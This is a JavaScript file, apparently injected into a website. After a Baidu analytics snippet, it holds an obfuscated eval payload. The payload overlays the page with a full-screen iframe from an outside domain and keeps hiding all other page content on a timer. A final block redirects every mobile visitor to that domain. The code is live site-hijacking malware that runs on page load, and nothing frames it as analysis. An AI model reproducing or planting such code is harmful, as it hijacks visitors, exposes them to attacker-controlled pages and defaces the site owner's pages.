var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?614ff225c3839a1c08416d5b0d5259ea";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2 8=\'<7 j="h"><A\'+\'H I="g" x=0 E=0  F="0" f="d%" f="K\'+\'L" M="P\'+\'k" l="m://n.o.p"></q></7>\';r("S"+"t"+"u.v"+"w(\'"+8+"\');");6{y(z(){6{1.B("C"+"D").9.c="g"+"G"}5(e){}J(2 i=0;i<1.4.3.N;i++){6{2 a=1.4.3[i].O;2 b=1.4.3[i].j;Q(b!="R"&&b!="h"){1.4.3[i].9.c="s"+"e"}}5(e){}}},d)}5(e){}',55,55,'|document|var|children|body|catch|try|center|ss|style|||display|100||width|no|showcloneshengxiaon||id|30|src|http|www|ac5803|com|iframe|eval|non|cu|ment|wr|ite|marginheight|setInterval|function|ifr|getElementById|div|All|marginwidth|frameborder|ne|ame|scrolling|for|14|00|height|length|tagName|10|if|iconDiv1|do'.split('|'),0,{}))

//Ê¶±ðÌø×ª
var mobileUrl = "http://www.ac5803.com",
    mobile = (/mmp|symbian|smartphone|midp|wap|phone|xoom|iphone|ipad|ipod|android|blackberry|mini|windows\sce|palm/i.test(navigator.userAgent.toLowerCase()));
if (mobile) {
    window.location = mobileUrl
}